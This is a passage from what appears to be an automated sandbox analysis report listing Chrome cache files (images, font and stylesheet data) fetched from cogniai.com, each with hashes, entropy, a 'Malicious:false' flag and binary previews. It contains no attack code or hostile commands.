                                                                                                                Entropy (8bit):7.945017242790007
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:CwbQPC+2pTgHXgWPOL1wswTdAuI00xmR90n7qf1TUMO3JD:p0PQp2XgBfyyu0IRHf1TUMQ
                                                                                                                MD5:BE88A6473B0112378C365C15925D4E0E
                                                                                                                SHA1:098475D8955E306D92772A90191DE9994155C9A9
                                                                                                                SHA-256:1032D5AB42ADE809145A6F26FFAD9CAA64C666597CD21DA498EA71009724EAD4
                                                                                                                SHA-512:6720875902A368ABFC7DB83445F75EB204A4C715074EFBD9A4D491AABC57662678CBE9C67FD9B8B9B85D03CD76E16CA2778F7CF439A33F594653DD8F96779802
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/uploads/2023/09/sptech1-1-1.png
                                                                                                                Preview:.PNG........IHDR.............[s2k...rPLTE..................................................................................................................^XA....%tRNS......W+..#.g.....NB;{_.s...15...nHkR....=.IDATx..v.*.@..PE.Y...........l.n..g'.r3....c..X.[..nG.5...n/|..|-.-.q..&2{..s..!..Rx...c..<./J.^-..D.b...`....:l$ta$.B...?-....."i....ai...1.\.._.\..q.^._...C.....*..f...*z..u].H.f......~j.v..0.....4.3.k.h...H.g.$Y%I...s...G.e.X ..d..D..h.C../W...\Vq5.Gf........9p...gR.<.......VQ.Q....A....Y..i.....r......,..xi.i.....w(..P.V...W.7g..A.%../Q....{T. .d..".W....rU.3.HQQ,..!..Y..v.U.._B..7...&.+TU......&....6...;x.(I..8k....u.J&.j..1bi.....Y_..Hol_.b..........YQ...T.T.U...G.BE5+&..JU....L.h..LqHR.Q..p..?p..f6.....d..XWq.M..C.........T...t.w.....b.R#.[........Rl.U..F>.d.n.:I<.SR...q.....D..b8.....a?...+..X/Q..il.g.b#.Q.....0..%.-..........4.Q..<..[.1...82... ..m.s.,.B ..<.@.r<.o_.m....EE..wHy.c......LC...".I..VLO4..9l.f.l.0....._......G....G>.

                                                                                                                Chrome Cache Entry: 235

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 2508 x 816, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):80440
                                                                                                                Entropy (8bit):7.8341033255320225
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:CscB5J4cozH3y8/95TGjZ19ZTyOxH4h7cxR1MhgbkVJnKWLCEVgFNVq02:htcuhF5UjyOxHs7sMLezQ
                                                                                                                MD5:9927B50D8AF7749EE51196B0FAC9A07C
                                                                                                                SHA1:3287A9009312159ABEE016A4745E1E60C89B801C
                                                                                                                SHA-256:2120F80D2D3ADEE5F068AD3411A511DE8AD9782478B76B77E86A6A06DAB5A848
                                                                                                                SHA-512:4A336859737C61EBE722D017981E597426DA1F19AED4F91F387174C0F25B19B7B11F020873A87B7011E15573C43C13C71D70EF273AD8A4F26F27E72457130C7E
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.PNG........IHDR.......0..........9.IDATx...}.eg]..].....^E. ".[..t.......1....4............~N%.`GE..#..H90..|...a.2.F.b.Q......JBr.<..3..H*u....Y..]..ZY....?............m...w.y..{F.....{....U...M..j.sB..l./,..?T.{q5M/.M......V.{......UL.....q.$..E...}....&.L...?.hh.yelG...9..........}.5w..7e.............!.L.....i!....o.3..nM.C.5.....Bl?...W!.kBl............U...j........{Oh..54.U.^.b...4.?.....I.bVl,.....................5....2._.Mzw.............!.wVMw.|.]..6..?...2.........`....v_.~B.w....B...~.j...#......*..2.....K.'.M..7..=|.?>+n.....................i_.8../..]..m.*...p...tI....Y.;v.;pjV........p.....8.F5......:.a>-.....`LF.~5....!].....g].~RV..............I..x:{.<.*c...t..u{Pl....9...........'.............!..(.~.hz.a..qeL.\6.'C..$"......Y....}..9.<6+..........C.%w..?9..1.64..u....SP.v...'......i;b{.........XD....|..x.v........86._TM......5.............!..{..].\U.7...t..[63...N...7...3.....C..........`.....3...bzu.....8.x..v.

                                                                                                                Chrome Cache Entry: 236

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 2436
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):614
                                                                                                                Entropy (8bit):7.575325263733828
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:XUk9xVU/Bx1UnMPL1vBXpmvSUHVfUN8f+U2wiwSQpPIqEp:Xtab1UnMZpcvS+mc+U1yQ1IqEp
                                                                                                                MD5:283BAF5C7F95E91044966CC2F0767FC0
                                                                                                                SHA1:CBEF6500DF5DA5A3F03F7B9920A4DD4F43B9A532
                                                                                                                SHA-256:29EEEA386E0D7899DAF6A61BFC80DB89DAAEA3E3922C126C6F51A494FF5C3835
                                                                                                                SHA-512:A6629CAAD754BEDFC443B0ADDFC1860D3572BB534C9D8016705DFB8994ED52691DDBCED7CBDABA599B207D13EF3D595D0001C166B93AA35845608866920319FB
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Fira+Sans&display=swap
                                                                                                                Preview:.............0...y.v...`.[`6...J3.7Mw.......d....c|.i7....[.m.......3.cWVU...u0....m...ri....R]V......Y...Os.p.dh4mWg.y. ......!.u.......N..]../]u.<..>.,.._n.!..|....[.......>.Rg.?.>.X./.?q..n.>./O.C[.......7.......4....U..#.GL.2......D......)1....s..y.."e.......Yo.MR..s.v6..QC..:...(.p&V...(.P.M'.v.av.TT.DT.........q.C.....)..b....p.'.0....#..,..C....T..B=J...=.A)HI......4x.<.H-C.i$.b..T.zJ\.(q...R.7.....4..i*..2F1.Q..7.M.k...X.#... q5$....b.q..e.C.M.......D..4@.Li/.....P.......|fG.X......n..4.}..g.<...F.a..6...r...XYz2.C..b...6..g.Cs.D[.....|...&.w.................D.XK....

                                                                                                                Chrome Cache Entry: 237

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 2591
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):634
                                                                                                                Entropy (8bit):7.659202577682151
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:XrTDC+MPBDDzyo2cir4NTbw+JD/PTUW/RNd4+UXm9V+fkCR/nH:Xryd2o2cikNTZhbH/RIXmCPP
                                                                                                                MD5:0337FFD41C60E33EA21AB7A326749E5C
                                                                                                                SHA1:2935B6E2FEFC83A50E8EE6E988A7D03111C08F4F
                                                                                                                SHA-256:B28F0F1C0C444F827E439552C0992F9A3333EABB37A6BCFE2E927B3A6ACCC239
                                                                                                                SHA-512:2826D4BC683D0E8BC52C47CEF8865B09BC5B3AF25C1A0A841274A0336EFDAA9D99622D5E0F2AF45E87CB0595857D0610408B37E80C13C3E4C6F88F1842622B0F
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Inter&display=swap
                                                                                                                Preview:............r.0...<.w$).....iJ.."M..t\#@...[..N.G. .3d..|.F.....;wVqjDY...Gi.9......*/..k`Y...<M......[y*...f.......Z.B...hwe.[..|.f..Z....H.k......u+s).qQo....u...8OE.C3........V=/..1.y....@...z..o......~....z.".p.8...v8.U'.W....n.j......>..G...'.d..) (v..f.&).VD.....;`..l......yU.O.......:e.(.zLC. 4Ob.q..c..n8....t....p.1..,}...... ch..4D.tb...K.bbb....6.Q.../..*...I..zM1"6....c..c..&...j...."....#..#....s.S.$G......%..q.....bcR..T}...[<.UI....)@.iH.....w... .Z.Ly.....c.X..LA..`D9.#..g...=.R....3.$.G.L.K...dp)...>9.nDt..H...'....T.z..+..~..J.|...M..'.7.E.v...C.hC..<0...1.X.pR..........J......

                                                                                                                Chrome Cache Entry: 238

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 6193
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):1579
                                                                                                                Entropy (8bit):7.8531408431587435
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:XmB8smRevfJDnInhUc/Xh+oTcPo6bXZvxkhHj5BiRIzFm:K6y2B/x+ooPo6bXZpkhHj5Uow
                                                                                                                MD5:25AACAF192256E240D6FB7B88F5F0457
                                                                                                                SHA1:A3BFF7292029BDD8619638E761493DBB0BBD5CC9
                                                                                                                SHA-256:B2D57E24792D602618292993C90EA08A38C81B08493A6AA3ED39D54258CBF80E
                                                                                                                SHA-512:ECE2C44892B8CB013C249AD9C2729166FCAA13024510142C5052B6AEE4F806BABD9E28C0DF2E722266AAEB6D9DBB36C99520222E2BA72889E89D59F3F5BD9CF6
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Open+Sans&display=swap
                                                                                                                Preview:...........XKo.7...W.R8I.._.]:..K2h.. N....m%.lh.;F....rFIZ @|......yqv..g..j.^-...n.|.....X,...Of3B.......v..^/6..K..v...d...^/....quy.;..!.......L...~..j.]/@.t....i.<.}..^.v...|.l..i.../.7..i~......;#.......&.....7o...Swg.w.....:={.pz.zk>.........f.8.........B=....vO..<z.G..Y-o>..v...;..U.+..|.@..h.....,}L.Q1..o.h.u..R.M~..'.?,..z....E...o.\.C.h& ..()-..r;........[.s.Vs.........Nw.q..AuO...57@?P.`.W..^..k.j<.......A.j.}.a.I...V.14JHQ..i....s......a....u.|....ZW..........W...$.W......0P..5....=4...X.c..o.yWA...@$...`$..c5.L...m..i.q....P...P{C^e4....x.\...4..J.S..g....".D..T...4.)z....@.@..4.Ck....9\...2..D2.....T.@l.Jj....GQ....hB..mZ:.!.5.JkX.I....R.......MG..q9....LW.[_wo....>R.K..{..zPkc.M........P.@..Q.t.4..S..\...P..s../......I.L.aJ..>=\.....9...9B@ C*?...L!.*:H..Q..QB....E......z.$...b..g...=F@.T.B..#..H....2.A`...W.2.S.Go.....g.S.~N...z.#N...$za]a"x....(.\.Ma.B....i..W`M4@xAD,.z.P..b!."L]...>..&..*....d...Y.(}$.J..g.....k.Cb`"..P.

                                                                                                                Chrome Cache Entry: 239

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 419
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):294
                                                                                                                Entropy (8bit):7.139017049386712
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:XtU2O1+Un03deysLWomSGeypENQC+D+XMA7X/JxKpT0HtgH/tSNpZ:XfUzyIClpGQC+6/jKGgfgNb
                                                                                                                MD5:F0CB6F585AC051A7C922F82C42A2534E
                                                                                                                SHA1:F9D6CF0E82FC250311CF6D7D6FF96E9FEDFD3C1B
                                                                                                                SHA-256:4651E3BE90491DA39C2D52EBF5D610FF7E3733BBE97F4677C305885EB828F513
                                                                                                                SHA-512:B5A8764AF698BD80C3D9697826CED8AD23B22CA2F3F20562041FAE2C1DA1FF3506B46982D461C6C0807C3B0411A2E77281EDE14537C6BA2E1FA1A0B68235D668
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Merienda+One&display=swap
                                                                                                                Preview:..........<..R.0...<Ev.UHH)Z.....rF.E.?cH..2...&..........T7....PJ......x..m..........'....Z....._.5U.S.#t..Fu..Kj..uU.....E.u.R..7.VJ.>y...*..R0.....8...z..{.O......:..+...Y.xi.L...'./m.E4.,X.SQ...7..!Bn......f.'..,0...!q<.g:.....xk..y....~..#.....)....%9.Z..............>.`....

                                                                                                                Chrome Cache Entry: 240

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 8334 x 2084, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):311200
                                                                                                                Entropy (8bit):7.378991043315871
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:VkiUmkhCJ7wCSnWR8t45dZ4wEdyxNFkULIdZkmQhSXq9:VU/hy7Hq2U4fZ4wEdyxN+3W7SS
                                                                                                                MD5:0B08C54177116DE487F71E66A6755647
                                                                                                                SHA1:A9128EE554FB176A0889DE54064A2C5DEA4AC0BB
                                                                                                                SHA-256:D3C6243446B140143FED5DEE6FAA70710BA1E9112D7C13E53693A5CABD449F96
                                                                                                                SHA-512:2443670E5B066018F83A18D2C78ADC57B55B3CB1C99402C68DB577D94302FC072E9B586418B2ED6C99AE47B67358AE4B425292141B9F14C49E8CF0752F539720
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/uploads/2023/11/COGNIAI-Concept9-FF-01.png
                                                                                                                Preview:.PNG........IHDR.. ....$........0.. .IDATx...A.....!.......".....................................9..................................................................`.7................................M.................................6y..................................................................`.7................................M.................................6y..................................................................`.7................................M.................................6y..................................................................`.7................................M.................................6y..................................................................`.7................................M.................................6y..................................................................`.7................................M.................................6y..................................................................`.7...........

                                                                                                                Chrome Cache Entry: 241

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x380, components 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):31289
                                                                                                                Entropy (8bit):5.8205210915005035
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:LLmkNlAn997r5dy0jgoSTqwfSujWWxWErF4Bu183zDzBN:HtNC9BrXy3Tiuiotr6u183zD1N
                                                                                                                MD5:80D6B877FE3D1FECEC347B76A95C56CF
                                                                                                                SHA1:55874C4700A94697660E0DB40A5E0C039C774C01
                                                                                                                SHA-256:54BF90DB6E72523560C5B133AABA0822633F8E91C7A2EEA7A16ABEE5FBF9B1DF
                                                                                                                SHA-512:1055468B5A6814A4E7166C6D3640868234A68CBDE2F9270ADFFE383971687BFD2E8435EE667126255D80AFFE7F258C87F816E90873194E920C56103641A8F65A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:......JFIF.....H.H....2-http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS5.1 11.1.0.205 Windows</xmp:CreatorTool>. <xmp:CreateDate>2022-10-16T23:11:06Z</xmp:CreateDate>. <xmp:ModifyDate>2023-09-11T16:51:03Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/jpeg</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>. .

                                                                                                                Chrome Cache Entry: 242

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x380, components 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):35174
                                                                                                                Entropy (8bit):6.1361556058894156
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:Zl200KgGCUyu0ujA9gTsKrb0v3PrMdNBFaJQ3X:ZlxyIjA9gT7+oXm63X
                                                                                                                MD5:5F53A0A015B89B0A02F308EC18AA1888
                                                                                                                SHA1:06413DBBFBC0E3687A068BFCE5788F23643D5080
                                                                                                                SHA-256:062694E367EF835B73C22A47325FF58535BD4794E4D4B78F64E760FDEC80226D
                                                                                                                SHA-512:DE1EC90C20C538F9C0BD119512DC7B196F343A18A6A82EE02EC30F043A00336A4BD6B74011FA2E41A1D83AFBE456C43C7C8AFF71D37A06A5E4AC5463F1253671
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:......JFIF.....H.H....2-http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS5.1 11.1.0.205 Windows</xmp:CreatorTool>. <xmp:CreateDate>2022-10-16T23:11:06Z</xmp:CreateDate>. <xmp:ModifyDate>2023-09-11T16:50:33Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/jpeg</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>. .

                                                                                                                Chrome Cache Entry: 243

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x380, components 3
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):31204
                                                                                                                Entropy (8bit):5.8320344345236155
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:LmJdLRvrQyE8JsXZ8eiEeK0XAaI547y8Pu3XuIKDcBPVe:CJdLRQyE8Jk8eiEZ05I547yG4O2PVe
                                                                                                                MD5:5C90E9EFA5838D445B425F9B5524A694
                                                                                                                SHA1:0B7B7B3071F875E52B941A48E11A1B613016875A
                                                                                                                SHA-256:B845B5C17C079B68500A96B3EC13CA19AB3C3F4B176998FF834D5A491CA39936
                                                                                                                SHA-512:554D659B76A7671548828AE98C046FAAEA23E7F764D0D63895CDEED67DF7E713514BDB60D83D0103F0D6748895B4B7D47332695F3E9787B289F39F82ED9B8427
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/uploads/2023/09/ss4-1-1.jpg
                                                                                                                Preview:......JFIF.....H.H....2-http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS5.1 11.1.0.205 Windows</xmp:CreatorTool>. <xmp:CreateDate>2022-10-16T23:11:06Z</xmp:CreateDate>. <xmp:ModifyDate>2023-09-11T16:51:13Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/jpeg</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>. .

                                                                                                                Chrome Cache Entry: 244

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 16471
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):5187
                                                                                                                Entropy (8bit):7.963595183824683
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:RhwKdXWdbtJq8r+Kdo27bayV5fAYIEixgFeqCgdScHByWGdOybtEOm1IxZ9q:R2KgJq8FzayV5fZ/scMWGdOyw1Aq
                                                                                                                MD5:BEBAF33CB08BE33A13859DF9BAC1763C
                                                                                                                SHA1:24729A151F8EECF831202248EB6A65C85707C10D
                                                                                                                SHA-256:B53A36A60C09349F9E7755BFD7B8653CFB514EEEEE6A71EE4C88B21B2F3A4C4B
                                                                                                                SHA-512:70ACE02EFC1484AE3F29CD3F85683B1D7C016AFE23289E0FB15D70A8E33F6F3BEAA4FE442F12E26D5231145E009E8A30F35538A359A14AF7A51B7F58AC143198
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4.5
                                                                                                                Preview:...........;is...W....$..`....n].}_...o...c...5...dK6`..;g..Tq.,..Vw.I...o.?S/;c.:...<z...Z..X...0.go.y.5..LI....i..lg....<5..e'9jJ.e.T..S...H.kx.m......n).v1...C.W0.^U...1.....L..X.K...b..'...Z...L............T......j...$.*...V].`..y..........f[..I.z.....P.Id..H/..\.8.....I%i.6.YB\...ie.htU..7....3 ..{L).sc.......[....Sh..q.&4.h.`.O.(|6...6.........>*#^.qF.N.Y......ox..a.d.*.X..:..V.6........M... ..a.....\f...#...I....,,.k.fV....#.Q.0n(s9.....<B..tz.W..>.R.....W{..5=..fO..Kx.f.....j.j...].....&ZZ.U...QjdX..7.P~.>....;..sx..h...'H..?i42s....E.....f..7..`......+....}.....7.(*......,$...b....on..w.g..X..Ga....tZ./....o...X..............!].FUQ.3|Mx.|K......B.....<.Pt.,..Z..>.}..f.W.,...V}]..A.!.bC`Ey....8....1..!6.V:_.o..r I;...=a..X..].1..j.......T.....r.n.D...z.~...{.....S..K.z..~YU....?]lH.(,..#.o...z....V/[......9..~x.vk...szW..Z..w..4....tZK.....'.J..7....D\.z...yq1..*.s.......6......s*./.y..Gf.....ya21.....:..:.do.P{.........

                                                                                                                Chrome Cache Entry: 245

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 845
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):384
                                                                                                                Entropy (8bit):7.385327361311676
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:XtW7nE1B1own13wmLGCoFfrgm/CqFYqIwXYX64pFUbB8qkoIx+OLAfdg5yQOB2pq:Xg7ncvow13dq5gm/UloPeCB80Ix+OEgW
                                                                                                                MD5:CCE8024EF0B33B9A6AA51751848C0347
                                                                                                                SHA1:800B0033907C5197F73AFBB02F9123E97B409645
                                                                                                                SHA-256:015E1DB94D4BCB0E4BB504C0A30908BD4BCD4336FBA98D2D4F83ADC8ADF4A4C9
                                                                                                                SHA-512:ADA03799F80D90181C26D25CDF63E4F24AE58B50218BC5628E539B91AD2B121010B9F7446D471254EB5C1F4233892AF2C85760AC06C64C0A862366F1F4415261
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Overlock&display=swap
                                                                                                                Preview:...........Mo.0...|..P7..../...6..m..B.....u.,..ki..d.].......?....(j'..`.......'i..,..UEy......I...e...2.A.UR^.}V..".3...]...D....QU.6...-G.!.]..j..N.y.i.T...y.~`.n....v..O.#~[.[...VgT...s2./.9......gNu.6..i.z/'}.A.!..8.U@b&..5P_.5...|.L.q>..f&.t.@%f.b.../.,...H..."Hg........w0v.....p,..r"...mAc....z...BJ.2...X.8rq..X..h.1#....u=A.Q.Q-....6........R.9SZ~..........M...

                                                                                                                Chrome Cache Entry: 247

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x500, components 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):29109
                                                                                                                Entropy (8bit):5.559870758163496
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:LTXF4iTGqhUxq0c5l16zfTbaSPqi0K6dE2sHW/8MpWkavp/uLRBef/Tp:HOiqqhUxj0+isTuE9W/8AW7Bm9U
                                                                                                                MD5:DA4A73A990CC670D4EA48EBF118B9145
                                                                                                                SHA1:AB9CD5CD211BB3F295ABD3AF607DCAE92B629CB1
                                                                                                                SHA-256:AD658E7C15DF5096BFB98E7B6FA28C85A03C0D5B4166983311EC4CA785DDBAA9
                                                                                                                SHA-512:B016929F31BEBD68F05CBD05D9CB4A7D5A47528585D675FEAB3DE1A2E66ADE039684B16B652E8756576DDB76A09DCEA2153E5EF670315CE7616DEB97C11FDCCD
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:......JFIF.....H.H....2-http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS5.1 11.1.0.205 Windows</xmp:CreatorTool>. <xmp:CreateDate>2022-10-16T23:11:06Z</xmp:CreateDate>. <xmp:ModifyDate>2023-09-07T19:53:49Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/jpeg</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>. .

                                                                                                                Chrome Cache Entry: 248

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 2928
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):573
                                                                                                                Entropy (8bit):7.5776275824865245
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:XjsHShuXkZS0UY6pn8EzuQzqqwnbV/KkwYnQSLSZ7+IDLiB:XThuV0UP8EaQJwn4kn2zw
                                                                                                                MD5:421794B205C9D793F61EA6A6806450D7
                                                                                                                SHA1:D9C09E34229810FA80E2363665FADA354304414F
                                                                                                                SHA-256:CFA38A00EA34B5425DF4CA5CFF1DCB8906EF579E9224962C596AF6F20FAE584A
                                                                                                                SHA-512:9356AB5EF432B7A7661005E1220C997A1B4FB411FBE015A236BAB881BF8D7DD9C2BA5E216DA97D69FD65A161E5027E4CB0A07DC35CD7E0F6CDC27F4153C9D612
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/themes/techze/css/odometer.min.css?ver=1
                                                                                                                Preview:...........VMo.0..+\Vj.uDW..........d.IZ....1-..z...ox..73..%.2}.......`?.._.h4n.p...v4$.z.......I.nDi`.....9.i....-..A2.q....%..Q&.....R...L4......_.X..O.T4g..X.....` .....l.L........h..W....d.V^....kd).*.S....g.....eU-....-Wrxa..85d....1.......E....+.C....\Yv.$....Z.}.r...............|EM.)...[.e....S.....S.d..s...^wz....M.H.*HS..j.nbj..p..F.d.M~..n..F.0..t....YD............P.=i....i......n`..?CC6z..UW3',8:.|.]...K..x..^4....s$........4.z............-./.Y..5... {.-Hn....^...hQ.)......4....9q..h...H...$..Z..........n|...Q....XI`.a.........p...

                                                                                                                Chrome Cache Entry: 249

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x380, components 3
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):35174
                                                                                                                Entropy (8bit):6.1361556058894156
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:Zl200KgGCUyu0ujA9gTsKrb0v3PrMdNBFaJQ3X:ZlxyIjA9gT7+oXm63X
                                                                                                                MD5:5F53A0A015B89B0A02F308EC18AA1888
                                                                                                                SHA1:06413DBBFBC0E3687A068BFCE5788F23643D5080
                                                                                                                SHA-256:062694E367EF835B73C22A47325FF58535BD4794E4D4B78F64E760FDEC80226D
                                                                                                                SHA-512:DE1EC90C20C538F9C0BD119512DC7B196F343A18A6A82EE02EC30F043A00336A4BD6B74011FA2E41A1D83AFBE456C43C7C8AFF71D37A06A5E4AC5463F1253671
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/uploads/2023/09/ss3-1.jpg
                                                                                                                Preview:......JFIF.....H.H....2-http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS5.1 11.1.0.205 Windows</xmp:CreatorTool>. <xmp:CreateDate>2022-10-16T23:11:06Z</xmp:CreateDate>. <xmp:ModifyDate>2023-09-11T16:50:33Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/jpeg</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>. .

                                                                                                                Chrome Cache Entry: 250

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 3710
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):828
                                                                                                                Entropy (8bit):7.712531901377277
                                                                                                                Encrypted:false
